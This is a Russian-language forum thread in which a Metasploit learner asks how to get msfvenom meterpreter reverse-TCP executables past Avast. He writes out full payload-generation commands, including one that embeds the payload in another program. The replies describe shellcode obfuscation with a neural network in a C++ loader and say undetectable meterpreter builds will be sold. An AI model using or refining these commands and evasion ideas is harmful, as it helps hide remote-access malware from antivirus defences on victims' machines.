• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

MSFVENOM - Как обойти антивирус?

Iridium2020

Member
13.11.2019
11
0
BIT
0
Все привет!. Недавно начал изучать metasploit и msfvenom на kali linux. В msfvenom практиковал с пейлодом (windows/x64/meterpreter_reverse_tcp). Применял разные виды шифрование (-e x64/xor, и другие x64 виды шифрования.) Ставил разные значения итеррации -i от 10 до 1000). Применял -b '\x00'. Отнюдь антивирус аваст мой все эти пейлоды в формате еxe блокирует напрочь. Без антивируса пейлод в процессах висит и могу подключаться внутри сети c другого компа. Встраивал пейлод в екзешные программы - Антивирус не блокирует)))) но программа вылетает.
Посоветуйте как можно преодалеть антивирус. Может чем то дополнить нужно параметры при создании пэйлода. Читал что антивирусы делают анализы по шаблонам которые внесены в их базе.
И еще помогите советом как можно преодолеть вылет программы езешной в которой встроен пейлод.
пейлод создавал таким образом
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=Мой IP LPORT=4444 -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe

и вот так с какой либо экзешной программой
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST="Мой IP" LPORT=4444 -x /root/programma.exe -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
Заранее всем большое спасибо
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
уже, не те времена)) нашел 2ва, способа обхода, один простой как 2ве копейки, а второй пришлось кодировать Shellcode с помощью нейросети) и вставлять в активатор на С++
)
Screenshot_1.png


30 минут и фудец)

`FUD meterpreter` скоро в продаже сама нейро-сеть и ее продукция)
 
Последнее редактирование:

ReQ

Green Team
04.01.2018
19
2
BIT
8
уже, не те времена)) нашел 2ва, способа обхода, один простой как 2ве копейки, а второй пришлось кодировать Shellcode с помощью нейросети) и вставлять в активатор на С++
)
Посмотреть вложение 42602

30 минут и фудец)

`FUD meterpreter` скоро в продаже сама нейро-сеть и ее продукция)
hoodoer/ENNEoS ты про это, + создание лоадера на С++?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!